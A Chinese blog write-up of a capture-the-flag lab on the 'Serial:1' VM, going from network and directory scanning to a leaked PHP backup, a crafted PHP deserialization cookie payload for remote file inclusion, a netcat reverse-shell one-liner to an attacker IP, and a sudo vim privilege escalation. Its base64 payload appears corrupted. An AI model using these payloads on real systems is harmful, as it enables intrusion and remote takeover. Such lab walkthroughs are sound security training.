靶机实战 Serial:1

0x01:环境搭建

        下载地址:Serial:1

        下载完成后得到一个如下图红框框选的文件

        打开VMware,新建虚拟机--->自定义--->一路回车到如下界面,选择使用现有虚拟磁盘

        然后找到刚才下载的.vmdk文件即可。

0x02:三板斧

        一、IP扫描

        打开kali,arp-scan -I eth0 -l

        二、端口扫描

        kali继续 nmap -p- -A -T4 -y 192.168.183.144

        端口开放是22 80

        三、目录扫描

        kali dirb http://192.168.183.144

0x03:漏洞发现

        首先去http://192.168.183.144/ 并没有什么信息


       
        再去http://192.168.183.144/backup/ 有一个压缩包

        下载,解压后发现是三个php文件

        源码泄露~

        通过代码分析,发现首页是有一个cookie值的,而这个cookie又先被序列化,后又经过base64编码。

        并且在log.class.php中,存在文件包含漏洞!

        
        BurpSuite 启动!
        打开代理,抓个包看看。

        果然存在一个编码后的cookie。
        解码后得到:O:4:"User":2:{s:10:"Username";s:3:"sk4";s:9:"Userwel";O:7:"Welcome":0:{}}
        简单分析一下可以看出,最后是定义了一个Welcome类,且是空值

0x04:漏洞利用

        我们构造一个payload:
        O:4:"User":2:{s:4:"name";s:3:"sk4";s:3:"wel";O:3:"Log":1:{s:8:"type_log";s:25:"http://172.16.222.111/afk.php;";}}

        让网站访问我们主机上的文件(这里利用他的文件包含漏洞)

        
        这里用txt,上传上去的时候不会解析,如果用php后缀的话,上传的时候就会解析,调用的时候又会解析,导致损坏文件,无法得到预期效果。

        base64编码:            Tzo0OiJVc2VyIjoyOntzOjQ6Im5hbagdgiO3M6Mzoic2s0IjtzOjM6IndlbCI7TzozOiJMb2ciOjE6e3M6ODoidHlwZV9sb2ciO3M6MjYgersdHA6Ly8xNzIuMTYuMy4xNC9hZmsudHh0Ijt9fQ==          
        将原来的cookie替换。

        由上图可以看出,存在反序列化漏洞。

        将文本内容修改为一句话木马,然后用AntSword连接,发现返回数据为空,这是因为AntSword没有cookie。

        所以我们换个方法,使用反弹shell。

        反弹shell:rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.183.134+443+>/tmp/f

        cd ..到根目录,找到了一个资格证书文件

        直接读取

        应该是密码,而且看起来不太像有什么加密

        直接去登录

        成功以sk4用户的身份登录,接下来就是提权。

        最简单的提权语句:sudo vim -c ':!/bin/sh'(要有执行sudo命令的权限)

        

        

以上就是本次靶场实战的全部内容,希望能对您有一点帮助。

 

        

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值